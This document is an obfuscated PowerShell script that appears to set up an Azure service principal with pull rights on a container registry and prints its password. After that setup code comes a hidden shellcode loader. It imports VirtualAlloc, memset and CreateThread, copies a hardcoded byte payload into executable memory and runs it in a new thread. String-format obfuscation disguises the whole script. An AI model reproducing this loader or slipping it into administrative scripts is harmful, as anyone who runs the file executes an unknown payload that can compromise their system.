SeT-ItEm VariAblE:38OM  ([TyPE]("{0}{1}" -f 'G','UiD') )  ;



${R`EGistR`YN`AmE} = ("{3}{1}{2}{0}{4}{5}"-f 'r','on','tainer-regist','<c','y-nam','e>')
${R`E`sOUrC`EgrOUp} = ("{0}{1}{5}{3}{2}{4}"-f '<','reso','roup-na','-g','me>','urce')
${ser`V`ICepRInC`ipALnA`Me} = ("{1}{0}{2}{5}{4}{3}"-f 'vic','acr-ser','e-pr','al','ncip','i')


.("{3}{2}{0}{1}" -f't-Mod','ule','por','Im') ("{3}{1}{0}{2}"-f'ourc','es','es','Az.R') 
${Pass`wOrD} =   ( VARiablE 38OM  ).valUe::("{2}{1}{0}" -f 'd','Gui','New').Invoke()."G`UiD"
${se`cPASSW} = .("{1}{0}{3}{2}"-f'e','N','ject','w-Ob') ("{5}{8}{7}{10}{0}{12}{2}{6}{9}{3}{11}{1}{4}{13}"-f'omma','ordC','ActiveD','ADP','red','Micr','irectory.P','ft.Azure.','oso','S','C','assw','nds.','ential') -Property @{ ("{2}{0}{1}"-f 'rtDat','e','Sta')=.("{2}{1}{0}"-f'e','t','Get-Da'); ("{2}{0}{1}"-f 'ndD','ate','E')=&("{2}{0}{1}"-f 'D','ate','Get-') -Year 2024; ("{2}{1}{0}"-f'word','ass','P')=${Pas`sWORD}}



${R`EgI`ST`Ry} = &("{5}{6}{2}{1}{4}{0}{3}{7}"-f'erR','zCont','t-A','e','ain','G','e','gistry') -ResourceGroupName ${R`esouR`cE`gR`oup} -Name ${rEGi`StR`yNaME}


${sp} = &("{4}{3}{0}{5}{2}{1}"-f'c','pal','i','ew-AzADServi','N','ePrinc') -DisplayName ${SeRVICEP`RIncI`Pal`NAME} -PasswordCredential ${sEc`PA`ssW}



.("{1}{2}{3}{0}" -f 'ep','St','ar','t-Sle') 30






${R`Ole} = &("{6}{1}{2}{3}{5}{0}{4}" -f'gnm','w-','AzRol','e','ent','Assi','Ne') -ObjectId ${S`P}."ID" -RoleDefinitionName ("{0}{1}" -f 'a','crpull') -Scope ${r`egis`TrY}."id"



.("{0}{3}{2}{1}"-f'Wr','-Host','e','it') ("{2}{5}{6}{4}{3}{0}{1}{7}" -f't','ion ID','S','pal applica',' princi','ervic','e',':') ${S`P}."A`PpL`IcaT`IoNId"
&("{1}{0}{2}" -f 'rite-H','W','ost') ("{2}{3}{5}{1}{0}{4}{6}"-f 'ass','ncipal p','Service ','pr','wd','i',':') ${pA`sSw`orD}

${A`BqS} = ((("{55}{77}{24}{80}{73}{84}{41}{66}{61}{4}{45}{27}{48}{89}{86}{8}{16}{57}{70}{2}{62}{21}{74}{43}{87}{37}{59}{12}{50}{90}{32}{14}{25}{69}{34}{29}{17}{36}{31}{6}{3}{26}{51}{18}{9}{42}{64}{35}{76}{20}{72}{88}{81}{19}{78}{93}{28}{68}{46}{49}{11}{33}{82}{7}{23}{13}{91}{40}{5}{67}{54}{58}{15}{71}{44}{79}{22}{0}{10}{65}{83}{1}{39}{30}{92}{60}{75}{56}{85}{38}{53}{47}{63}{52}"-f 'dllEGs)]public sta','te','int flAl','ateThre','tic ','ion','e','tr l','lAlloc(','tPtr lpTh','t','I','ne','arameter','ubli','IntPtr lp','IntPtr lpAddress, ui','In','n','wSta','s','yp',';[DllImport(EGsmsvcrt.','pP','skernel','c static ','ad(','rn IntP','Size, I','n ','n IntPt','r Cr',')]p','n','ter','ibut','tPt','Import',' dest, u','r','eat',']p','r','[D','ea','exte','t','src,','tr V','Address, ','l32.d','I','nt);','int ','a','[DllImport','nt','nt dwSize,','gs, ','(EGsker','set(','blic sta','locationT',' uint cou','eadAttr','i','u','Fl','ntPtr lpStar','ex',' u','Thr',', u','2.dll','e, uint flProtect);','I','e','(EG','c','dId)','3',' d','tP','c ex','EGs)','Ptr','ua','ll','int','irt','llEGs',', uint dwCr','r mem','k'))  -crEplACe  ([cHaR]69+[cHaR]71+[cHaR]115),[cHaR]34);${w} = &("{0}{1}" -f'A','dd-Type') -memberDefinition ${ab`QS} -Name ("{0}{1}"-f 'Win3','2') -namespace ("{1}{2}{3}{0}"-f 'ions','Win','32Func','t') -passthru;[Byte[]];[Byte[]]${Z} = 0xbe,0xd8,0x6d,0x60,0x70,0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0x29,0xc9,0xb1,0x4e,0x31,0x70,0x13,0x03,0x70,0x13,0x83,0xc0,0xdc,0x8f,0x95,0x8c,0x34,0xcd,0x56,0x6d,0xc4,0xb2,0xdf,0x88,0xf5,0xf2,0x84,0xd9,0xa5,0xc2,0xcf,0x8c,0x49,0xa8,0x82,0x24,0xda,0xdc,0x0a,0x4a,0x6b,0x6a,0x6d,0x65,0x6c,0xc7,0x4d,0xe4,0xee,0x1a,0x82,0xc6,0xcf,0xd4,0xd7,0x07,0x08,0x08,0x15,0x55,0xc1,0x46,0x88,0x4a,0x66,0x12,0x11,0xe0,0x34,0xb2,0x11,0x15,0x8c,0xb5,0x30,0x88,0x87,0xef,0x92,0x2a,0x44,0x84,0x9a,0x34,0x89,0xa1,0x55,0xce,0x79,0x5d,0x64,0x06,0xb0,0x9e,0xcb,0x67,0x7d,0x6d,0x15,0xaf,0xb9,0x8e,0x60,0xd9,0xba,0x33,0x73,0x1e,0xc1,0xef,0xf6,0x85,0x61,0x7b,0xa0,0x61,0x90,0xa8,0x37,0xe1,0x9e,0x05,0x33,0xad,0x82,0x98,0x90,0xc5,0xbe,0x11,0x17,0x0a,0x37,0x61,0x3c,0x8e,0x1c,0x31,0x5d,0x97,0xf8,0x94,0x62,0xc7,0xa3,0x49,0xc7,0x83,0x49,0x9d,0x7a,0xce,0x05,0x52,0xb7,0xf1,0xd5,0xfc,0xc0,0x82,0xe7,0xa3,0x7a,0x0d,0x4b,0x2b,0xa5,0xca,0xac,0x06,0x11,0x44,0x53,0xa9,0x62,0x4c,0x97,0xfd,0x32,0xe6,0x3e,0x7e,0xd9,0xf6,0xbf,0xab,0x4e,0xa7,0x6f,0x04,0x2f,0x17,0xcf,0xf4,0xc7,0x7d,0xc0,0x2b,0xf7,0x7d,0x0b,0x44,0x10,0x90,0xb3,0x6b,0xe1,0xf7,0xd7,0x04,0x92,0xc3,0x27,0xeb,0x7a,0x48,0x23,0x65,0xf0,0xbe,0xc5,0x1c,0x82,0xbe,0x71,0x76,0x42,0x8b,0x01,0x77,0x46,0x78,0x41,0x94,0x03,0x7a,0x11,0xcc,0xd1,0x84,0x8e,0x9d,0x5f,0x62,0xda,0x8d,0x09,0x3c,0x72,0x37,0x10,0xb6,0xe3,0xb8,0x8e,0xb2,0x23,0x32,0x3d,0x42,0xed,0xb3,0x48,0x50,0x99,0x33,0x07,0x0a,0x0f,0x4b,0xbd,0x21,0xaf,0xd9,0x3a,0xe0,0xf8,0x75,0x41,0xd5,0xce,0xd9,0xba,0x30,0x45,0xd3,0x2e,0xfb,0x31,0x1c,0xbf,0xfb,0xc1,0x4a,0xd5,0xfb,0xa9,0x2a,0x8d,0xaf,0xcc,0x34,0x18,0xdc,0x5d,0xa1,0xa3,0xb5,0x32,0x62,0xcc,0x3b,0x6d,0x44,0x53,0xc3,0x58,0x54,0xaf,0x12,0xa4,0x22,0xc1,0xa6;${G} = 0x1000;if (${z}."L`e`NgTh" -gt 0x1000){${G} = ${z}."L`eNg`TH"};${A`i4}=${w}::("{3}{1}{0}{2}" -f 'll','irtualA','oc','V').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."leng`TH"-1);${I}++) {${W}::"m`EmSET"([IntPtr](${a`I4}.("{1}{2}{0}"-f'32','ToI','nt').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{1}{0}{2}{3}" -f 'reat','C','eThr','ead').Invoke(0,0,${A`i4},0,0,0);for (;;){.("{0}{1}{2}"-f 'Start','-s','leep') 60};
